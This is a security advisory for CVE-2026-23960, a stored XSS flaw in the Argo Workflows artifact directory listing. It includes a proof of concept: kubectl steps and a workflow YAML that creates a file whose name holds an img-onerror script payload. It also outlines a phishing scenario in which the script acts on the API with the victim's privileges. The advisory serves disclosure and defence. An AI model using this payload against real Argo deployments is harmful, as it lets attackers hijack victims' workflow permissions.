CVE-2026-23960

Summary

Stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.

Details

The directory listing response in server/artifacts/artifact_server.go renders object names directly into HTML via fmt.Fprintf without escaping. Object names come from driver.ListObjects(...) and are attacker‑controlled when a workflow writes files into an output artifact directory.

https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244

PoC

1. Deploy Argo Workflows:

kubectl create ns argo
kubectl apply --server-side -f manifests/base/crds/full
kubectl apply --server-side -k manifests/quick-start/postgres

1. Port‑forward Argo Server:

kubectl -n argo port-forward deploy/argo-server 2746:2746

1. Create the PoC workflow:

cat > /tmp/argo-xss.yaml <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: xss-artifact-test-
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
      command: [sh, -c]
      args:
      - |
        mkdir -p /tmp/artifacts
        touch '/tmp/artifacts/xss"><img src=x onerror="alert(document.domain)">.html'
    outputs:
      artifacts:
      - name: dir
        path: /tmp/artifacts
        archive:
          none: {}
EOF
kubectl -n argo create -f /tmp/argo-xss.yaml

1. Wait for completion:

kubectl -n argo get wf -w

1. Get the node ID:

kubectl -n argo get wf <wf-name> \
  -o jsonpath='{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'

1. Open the listing:

https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/

<img width="1220" height="349" alt="image" src="https://github.com/user-attachments/assets/9d859826-c7cd-403b-988e-74695552944b" />

Impact

• The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
• The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.

As the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):

• Read information about the victim’s workflows.
• Create or delete workflows.